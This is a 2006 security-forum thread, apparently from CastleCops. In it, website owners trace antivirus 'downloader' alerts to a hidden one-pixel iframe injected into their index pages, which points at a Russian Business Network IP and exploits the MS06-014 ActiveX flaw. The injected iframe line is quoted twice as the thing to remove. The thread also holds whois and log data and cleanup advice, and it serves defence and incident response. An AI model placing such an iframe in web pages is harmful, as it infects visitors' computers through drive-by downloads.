CastleCops, Internet Crime Fighters
Need help? Click here to register for free! Absolutely zero advertisements on this site!

Donation/Premium
spacer
block bottom
Security Central
spacer
· Home
· PIRT/Fried Phish
· MIRT
· SIRT
· Deutsch
· Wiki
· Newsletter
· O16/ActiveX
· CLSID List
· Contest2007
· Downloads
· Feedback (send)
· Forums
· HijackThis
· Hijacktrend
· LSPs
· My Downloads
· O18
· O20
· O21
· O22
· O23
· O9
· Premium
· Private Messages
· Proxomitron
· Reviews
· Search
· StartupList
· Stories Archive
· Submit News
· WsIRT
· Your Account
· Acceptable Use Policy
block bottom
spacer spacer

Downloader Virus
Goto page 1, 2  Next
 
Post new topic   Reply to topic       All -> FavForums -> Norton Anti-Virus [del.icio.us!] [digg it!] [reddit!]
View previous topic :: View next topic  
Author Message
tatlyn

Cadet
Cadet


Joined: Jun 27, 2006
Posts: 3
Location: Canada

PostPosted: Tue Jun 27, 2006 10:02 pm    Post subject: Downloader Virus
Reply with quote

when i go to the index page of my own web site, Norton Anti-Virus pops up with the alert that a virus has been detected on my computer, the virus name is *downloader* and it is located in:

c:\windows\tempo...\index[1].htm

it further says that access to the file has been denied.

I've searched for the file and it doesn't exist. My web site's index page is, index.html.

This alert is only coming up when I go to the index page of my web site. I can go to other web site's no problem.

I've done a virus scan but Norton doesn't find the virus through a scan, only when I go to my page.

Can anyone advise what I should do to get rid of this virus? Are people visiting my web site being infected with the virus?

Any help that can be provide would be so greatly appreciated.

Lynda

Back to top
View users profile Send private message
ecd

Lieutenant
Lieutenant


Joined: May 18, 2006
Posts: 154


PostPosted: Tue Jun 27, 2006 10:05 pm    Post subject:
Reply with quote

Can we try your index page to see if we get it, too?

You might have to empty your temporary internet files from the browser.
Know how to do that?

It is not impossible for a hacker to get into your code on a website. You might want to go in and change your password now. Can you open your site in FTP or the authoring program you use and check your code for alteration?

Back to top
View users profile Send private message
tatlyn

Cadet
Cadet


Joined: Jun 27, 2006
Posts: 3
Location: Canada

PostPosted: Tue Jun 27, 2006 11:54 pm    Post subject:
Reply with quote

thanks so much for your reply.

I've already deleted cookies, history and all temp internet files. I'll go now and see if I can spot something in my code that has changed or been added.

Edited to delete my web address. I'm nervous now that it will be tampered with again. I've had the site for several years and never had any problem like this.



Last edited by tatlyn on Wed Jun 28, 2006 12:09 am, edited 1 time in total
Back to top
View users profile Send private message
Bad_Frogger

Captain
Captain


Joined: May 12, 2006
Posts: 507
Location: Canada

PostPosted: Wed Jun 28, 2006 12:07 am    Post subject:
Reply with quote

Hi tatlyn,

Your page is definitly corrupted.
It's like an ActiveX drive by download.

I advise people not to go to your link above unless they
have a high level of protection/savvy.

At least you know it's the page and not your PC.
I and I'm sure others will try to figure out what it is.

Bad out.


_________________
MS's "New Coke"
Back to top
View users profile Send private message
tatlyn

Cadet
Cadet


Joined: Jun 27, 2006
Posts: 3
Location: Canada

PostPosted: Wed Jun 28, 2006 12:07 am    Post subject:
Reply with quote

yep, this code,

<iframe src= http://81.95.146.98/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>

had been added to the very top of my source code. I uploaded my index page (to replace the one that was there) and I'm no longer getting the virus alert.

Does this mean that I was hacked? I'm guessing the added code redirected to a malicious page? Any insight would be very much appreciated.

Lynda

Back to top
View users profile Send private message
Bad_Frogger

Captain
Captain


Joined: May 12, 2006
Posts: 507
Location: Canada

PostPosted: Wed Jun 28, 2006 12:17 am    Post subject:
Reply with quote

This is what I get from XPL.

MDAC ActiveX code execution (CVE-2006-0003)

Unspecified vulnerability in the RDS.Dataspace ActiveX control, which is contained in ActiveX Data Objects (ADO) and distributed in Microsoft Data Access Components (MDAC) 2.7 and 2.8, allows remote attackers to execute arbitrary code via unknown attack vectors. Addressed in Microsoft Security bulletin MS06-014.

Bad out.


_________________
MS's "New Coke"
Back to top
View users profile Send private message
Bad_Frogger

Captain
Captain


Joined: May 12, 2006
Posts: 507
Location: Canada

PostPosted: Wed Jun 28, 2006 12:20 am    Post subject:
Reply with quote

I can't explain how the code got there or what it does.
Most all the info available is about protecting yourself,
windows patches yadda yadda yadda.

Microsoft Security Bulletin here-
http://www.microsoft.com/technet/security/bulletin/ms06-014.mspx

Bad out.


_________________
MS's "New Coke"
Back to top
View users profile Send private message
Bad_Frogger

Captain
Captain


Joined: May 12, 2006
Posts: 507
Location: Canada

PostPosted: Wed Jun 28, 2006 12:29 am    Post subject:
Reply with quote

The IP address that was injected on your page goes back to
Russian Business Network, I would say yes your site was hacked.
Probably someone trying to build a Botnet, as the vulnerability
they are trying to exploit deals with remote control of PC's.

Bad out.


_________________
MS's "New Coke"
Back to top
View users profile Send private message
ecd

Lieutenant
Lieutenant


Joined: May 18, 2006
Posts: 154


PostPosted: Wed Jun 28, 2006 4:52 am    Post subject:
Reply with quote

Yes, Socket Sheild reports that exploit to me, too.

They were capturing your visitors into a frames page on their server
where the malicious code was residing.

You really need to change the password on your login to the server, and make it HARD to crack, no puppy names or favorite candy-bars. Like
random numbers and letters upper and lower case. And report it to your hosting provider, they have access logs.

I had a site I take care of hacked into couple weeks ago. They put a link to their disgusting site in a footer that showed up on all her pages. I changed the password immediately.

Back to top
View users profile Send private message
Whatsthis4

Cadet
Cadet


Joined: Jun 30, 2006
Posts: 3
Location: USA

PostPosted: Fri Jun 30, 2006 5:08 am    Post subject:
Reply with quote

Hi,

I searched the 81.95.146.98 address to see if I could find anyone that has had this same problem and to my good fortune it brought me here.

I have been attacked twice now in about 2 months. Both times it left my index.html inaccessible. I'm thinking because the code was inserted before the html tag, it causes an error and stops reading the rest of the source. That same line of code was inserted first thing on my index page both times.

Is your host Ipowerweb by chance? The reason I am asking is I am trying to determine if it might be a server wide thing or a personalized attack. I have contacted my host (Ipowerweb) about this and they just gave the standard "change your password or maybe remove the FrontPage extensions from your site" answer with no further discussion. Some things that happened during our discussion made me think they knew all about the problem.

My site is all about adware/spyware/virus dangers and I offer repair and clean up services. My target group is local as are most of my visitors. I use print advertising to get the word out. My site pretty much isn't indexed by the search engines and if I do a search for my business name very little if anything comes up in the results. For that reason I find the chances pretty slim that this was a personal attack from someone in Taiwan.

I have done a lot of research trying to figure out what happened. I also came up with the same Russian info on the ip. I did some looking into my access logs for my site and also came up with this:

218.210.11.180 - - [24/Jun/2006:04:59:38 -0700] "GET / HTTP/1.1" 200 622 "file:///E:/00search/SPdealer/SP_dealer2.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; .NET CLR 1.1.4322; InfoPath.1)"

I checked the IP and it is from a place called New Century InfoComm Tech. Co., Ltd. out of Taipei, Taiwan. I am assuming that the referrer line coming from a file on the E drive of someone's computer isn't normal.

Do you have access to your logs? If you do maybe you might find the same line also. If you have the ability to ban ip's from you're site this might be one to put in there.

When the first attack happened I checked the source on the Index.html at 81.95.146.98 and found code that seemed to be trying to load a file called Win.exe. I make my living cleaning garbage off of people's computers and I seem to remember that file. I don't think I would have to search these forums too far to find something on it.

Do you have FrontPage extensions installed on your site? If you don't, at least I can rule that out as the possible entry point.

My current theory has someone using that file to get in through a hole of some sort. Maybe even through the FrontPage extensions.

Not really asking a question, just relaying information from my experience with this problem. Ultimately solved my issue by removing the code but it didn't stop it from happening again.

Jim

Back to top
View users profile Send private message
deb

Guest
IP: 195.93.*.*






PostPosted: Fri Jul 07, 2006 11:59 am    Post subject: downloader virus
Reply with quote

Hi just read through these posts and I also have the downloader virus on my pc.
If i run norton scan it doesnt detect anything but as soon as i go onto my own website then the virus alert pops up.
I dont understand computer jargon very well and I havent a clue how to get rid of this. I have deleted cookies, temp files etc to no avail. If i go into norton to see where the infected file is it says its in temp internet files but I cant find anything.
Plz could someone help me im pulling my hair out !!

Back to top
Bad_Frogger

Captain
Captain


Joined: May 12, 2006
Posts: 507
Location: Canada

PostPosted: Sat Jul 08, 2006 12:35 am    Post subject:
Reply with quote

Hi deb,

I think the Norton pop ups are probably telling you it is stopping the infection from your site.

Did you create the site using HTML on your machine or use some
online website builder so you've never even seen the HTML code?

Remove the problem from your webpage you will need to edit the HTML like tatlyn did in the post above.

The line of code you need to remove should look like this
<iframe src= http://81.95.146.98/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>

In order to be more specific I would need to have a link to your page so I could view the source code.
But you would have to be the one to use a password
and actually change the code.

Make sense?

If you don't want to make your page public on the forum you could PM your page URL to me.
But I think you will have to register here and sign in to use PM. It's free.

Bad out.


_________________
MS's "New Coke"
Back to top
View users profile Send private message
leek

Cadet
Cadet


Joined: Jul 07, 2006
Posts: 4
Location: USA

PostPosted: Sat Jul 08, 2006 1:11 am    Post subject:
Reply with quote

Hello,

It is not limited to one provider or site. It appears to be a new bot which started around ten days ago and is slowly making rounds. See:

http://www.dmgenie.com/smf/index.php?PHPSESSID=29b8967c8a692a61d18ee1aa8e9f2621&topic=3601.new

It has affected my friend's site too (not the above -- another site), and he uses Apache on Linux.

Apparently entry occurs through user's PC, before they upload their data to their hosting provider or server. It does not compromise the server. The virus infects HTML files on a person's PC before they send them to the server, and it puts a malformed iframe tag at the top of the page, an iframe which references a Russian site:

Code:

inetnum:        81.95.144.0 - 81.95.147.255
netname:        RBNET
descr:          Russian Business Network
admin-c:        RBNR-ORG
tech-c:         RBNR-ORG
mnt-by:         RBN-MNT
status:         ASSIGNED PA
country:        RU
remarks:        INFRA-AW
source:         RIPE # Filtered

role:           Russian Business Network Registry
address:        Russian Business Network
address:        12 Levashovskiy pr.
address:        197110 Saint-Petersburg
address:        Russia
remarks:        Points of contact for RBN Network Operations
remarks:        ------------------------------------------------------
remarks:        Routing and peering issues:         ncc@rbnnetwork.com
remarks:        SPAM and Network security issues: abuse@rbnnetwork.com
remarks:        Customer support:               support@rbnnetwork.com
remarks:        General information:               info@rbnnetwork.com
remarks:        ------------------------------------------------------
admin-c:        ON316-RIPE
admin-c:        NI212-RIPE
tech-c:         MZ2231-RIPE
tech-c:         NI212-RIPE
nic-hdl:        RBNR-ORG
mnt-by:         RBN-MNT
source:         RIPE # Filtered
abuse-mailbox:  abuse@rbnnetwork.com

% Information related to '81.95.144.0/20AS40989'

route:          81.95.144.0/20
descr:          TcS Network
origin:         AS40989
mnt-by:         RBN-MNT
source:         RIPE # Filtered


Mozilla / Firefox users are not affected, since those browsers ignore the bad iframe, and even if they didn't, it wouldn't cause harm. IE users are vulnerable. I don't yet know the mechanics of how it installs itself by going to the Russian site.

My advice: Don't use IE -- use Firefox, Opera, anything but IE. And use Privoxy ( http://www.privoxy.org/ ).

Back to top
View users profile Send private message
Bad_Frogger

Captain
Captain


Joined: May 12, 2006
Posts: 507
Location: Canada

PostPosted: Sat Jul 08, 2006 1:51 am    Post subject:
Reply with quote

Further up in this thread I found the vulnerability that is exploited
when you get to the russian site and the page loads.

MS security bulletin.
http://www.microsoft.com/technet/security/bulletin/ms06-014.mspx
It's more ActiveX crap. Thanks MS.

I am immune Firefox, NoScript, XPL.

Thanks for the info.


_________________
MS's "New Coke"
Back to top
View users profile Send private message
leek

Cadet
Cadet


Joined: Jul 07, 2006
Posts: 4
Location: USA

PostPosted: Sun Jul 09, 2006 5:42 pm    Post subject:
Reply with quote

The same Russian netblock is mentioned here:

http://securityresponse.symantec.com/avcenter/venc/data/backdoor.eterok.c.html?Open

Back to top
View users profile Send private message
Display posts from previous:   
Post new topic   Reply to topic       All -> FavForums -> Norton Anti-Virus All times are GMT
Goto page 1, 2  Next
Page 1 of 2

 
Quick Reply:
Username: 

Quote the last message
Attach signature (signatures can be changed in profile)
 
You can post new topics in this forum
You can reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum


Powered by phpBB © 2001 phpBB Group
spacer spacer